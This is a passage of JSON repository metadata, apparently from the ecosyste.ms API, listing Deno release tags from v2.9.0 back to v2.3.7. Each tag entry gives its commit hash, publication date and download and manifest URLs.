ttps://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":